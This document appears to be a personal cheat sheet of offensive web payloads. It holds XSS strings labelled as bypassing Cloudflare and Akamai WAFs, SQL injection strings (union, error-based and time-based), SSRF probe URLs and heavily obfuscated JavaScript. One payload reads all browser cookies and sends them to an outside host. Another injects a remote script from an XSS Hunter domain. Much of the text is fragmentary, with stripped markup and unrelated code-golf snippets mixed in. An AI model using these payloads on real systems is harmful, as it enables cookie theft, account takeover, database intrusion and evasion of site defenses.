# HTML INJECTION ## MULTI WAF BYPASS FROM 5/10 urldecode ### newest gareth [].map.call`${eval}\\u{61}lert\x281337\x29` [].sort.call`${alert}1337` ## ANCHORS YO more cloudflare newest: [+] Cloudflare: Accepted [
] [+] Cloudflare: Accepted [javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie] [+] Cloudflare: Accepted [] [+] Cloudflare: Accepted [] XSS">
XSS XSS"> # XSSBRUTE MAGICIAN PAYLOAD (use w/ chrome/chromium/brave/edge only) JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*\74k #X55.is usaeg: #1. Replacing alert(1): '-import('//X55.is')-' #2. As href or src attributes: "autofocus onfocus=alert(1)// '-alert(1)-' \'-alert(1)// javascript:alert(1) throw Uncaught=onerror=eval, e=Error`*/;alert\x281\x29`,http://e.name='/*', e\ new akamai ">Click ">
navigation.navigate('javascript:alert(1)') javascript:/*--> [1].group(alert) Function.call`$${name}``` #quotes filtered? np /alert(1)//\ #Waf Slapper d=document,b='`',d['loca'+'tion']='javascript:aler'+'t'+b+domain+b #VULN + XSS COMBOS #SSRF (curl-based) ?url=https://brutelogic.com.br/poc.svg #SSRF (PHP file_get_contents) ?url=data:, #SQLi (error-based) ?id='\ # Testing for blind sqli manually---------------------- Oracledbms_pipe.receive_message(('a'),10) MicrosoftWAITFOR DELAY '0:0:10' PostgreSQLSELECT pg_sleep(10) MySQLSELECT sleep(10) We can easily manually test for all of these values Union Select@k:=0x3c2f5469746c652f3c2f5363726970742f27223e3c5376672f4f6e4c6f61643d616c6572742831293e,@k,@k,@k# (add more @k's to match number of columns) TrackingId=x'||dbms_pipe.receive_message(('a'),10) TrackingId=x'||WAITFOR DELAY '0:0:10' TrackingId=x'||pg_sleep(10) TrackingId=x'||sleep(10) ------------------------------------------------------- back to xss ------------ <--` --!>1 ">H#x ">pew "> ">

dragme 0 union/**/select 1,version(),@@datadir ?"> "> "> ">

alert ">dragme ">click &idPais=3&clave=%3Cimg%20src=%22WTF%22%20onError=%22{ ">
"/>a "> ">

Right-Click Here 0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user 1'UNION/*!0SELECT user,2,3,4,5,6,7,8,9/*!0from/*!0mysql.user/*- 1%0bAND(SELECT%0b1%20FROM%20mysql.x) %0Aselect%200x00%2C%200x41%20not%20like%2F*%2100000table_name*%2F%2C3%20from%20information_schema.tables%20limit%201 ">click "> "> %3Cmarquee%20loop=1%20width=%271%26apos;%27onfinish=self[`al`+`ert`](1)%3E%23leet%3C/marquee%3E %2522%253E%253Csvg%2520height%3D%2522100%2522%2520width%3D%2522100%2522%253E%2520%253Ccircle%2520cx%3D%252250%2522%2520cy%3D%252250%2522%2520r%3D%252240%2522%2520stroke%3D%2522black%2522%2520stroke-width%3D%25223%2522%2520fill%3D%2522red%2522%2520%2F%253E%2520%253C%2Fsvg%253E ?"> %2522%253E%253C%2Fdiv%253E%253C%2Fdiv%253E%253Cbrute%2520onbeforescriptexecute%3D%2527confirm%28document.domain%29%2527%253E "> "> %3CEvil%20script%20goes%20here%3E=%0AByPass %3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E ? ">
"> ">
">
Right-Click Here "> "> ">click ">>
" >> 10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables) "><img title=""> '1337'.split(window,window[Symbol['split']]=alert) ">cus='alert("XSS")’>X '1337'.replace(window,window[Symbol['replace']]=alert) str0d"/> ">

">
#alert.bind()(1)
#alert.valueOf()(1)
#Reflect.apply(alert, null, [1])
	
(X=t?X+r*50:0,i=h=11+6*C(t*4+X%1)<<5;--i;x.fillRect(...t?[X-r*i/4,600+(r*8&3?i-h:h-i),i/4,2]:[i*8,r*999,h,r]))r=Math.random()
">Click
confrm()

">
clickme
cookieStore.getAll().then(x=>fetch('//02.rs/'+JSON.stringify(x)))
$='',_=!$+$,$$=!_+$,$_=$+{},_$=_[$++],__=_[_$$=$],_$_=++_$$+$,$$$=$_[_$$+_$_],_[$$$+=$_[$]+(_.$$+$_)[$]+$$[_$_]+_$+__+_[_$$]+$$$
+_$+$_[$]+__][$$$]($$[$]+$$[_$$]+_[_$_]+__+_$+"($)")()
for(w=c.width&=j=10368;j;x.fillRect(j%w,--j>>7,1-Z/w*T+q,T=1))for(a=1-j%w/64,b=j/7e3-1,q=Y=Z=b/5,X=t*30;++Z>3)
**2^Z>>3)**8*50>Y||T|(q=S(X&Y&Z,a=b=-1,T=Z/w)*2/Z+1/Z));Y+=b)X-=a
%u003Csvg onload=alert(1)>
#document.body.innerHTML=eval('Error``.stack//# sourceURL=http://\u{3c}img/src/onerror=alert(1)\u{3e}//')
%u3008svg onload=alert(2)>
">
%uFF1Csvg onload=alert(3)>
for(i=400;i--;x.fillRect(960-(i>200)*5,i%200*6,5,7))x.fillStyle=`hsl(${q=(t*9+i)^i} 99%${q%7>4?50:0}%`x.drawImage(c,-99,-40,2118,1160)

red ' onmouseover='alert(1337)'
t3_u9po1l%20onmouseover=alert(document.domain)%20y=/t1_i5sxroa


eval.call`${'alert\x2823\x29'}`
setTimeout`alert\x2823\x29`
setInterval`alert\x2823\x29`
onerror=alert;throw 23;
var{haha:onerror=alert}=0;throw 1
var{a:onerror}={a:alert};throw 1
'alert\x2823\x29'instanceof{[Symbol.hasInstance]:eval}
{onerror=alert}throw 23
throw{},onerror??=alert,"XSS"??123
throw onerror=eval,SyntaxError`alert\x2823\x29`  [FF only]
throw onerror=eval,Error`alert\x2843\x29` [FF only]
window.name='1;var Uncaught=1;alert(23)';
location='xss_short.html';
{onerror=eval}throw/0/+name
example.com/#1/-alert(23)/
throw/a/,Uncaught=1,g=alert,a=g+0,onerror=eval,/1/g+a[14]+[23,331,337]+a[15]
Function`a${name}```
location='javascript:'+location
location=/javascript:/.source+location
location=`javascript:`+location
example.com/xss?%0aalert(/23/)//
Function`a${unescape. call`${location}`}```
eval.apply`${[`alert\x2823\x29`]}`
throw/**/Uncaught=window.onerror=eval,";alert\5023\51"
Function`a${`alert${Function`a${`return fromCharCode`}{fromCharCode}``${String}``40`}23${Function`a${`return fromCharCode`}{fromCharCode}``${String}``41`}`}```
[]["filter"]["constructor"]`alert\x2823\x29```

x='javascript:alert\x2823\x29';x={x:location}=this
{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:'',message:'alert\x2823\x29'}
document.body.innerHTML="\u003cimg src=x onerror=alert\u002823\u0029\u003e";
 
location=/javascript:alert%2823%29/.source;
document.location='javascript:alert%2823%29'


### NEW PAYLOADS 5/11/2022



test







XSS
XSS
XSS
XSS
XSS
XSS
XSS
XSS

-------------------------------------------
XSS HUNTER 
-------------------------------------------

">
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://scumdestroy.xss.ht\';document.body.appendChild(a)')
">
">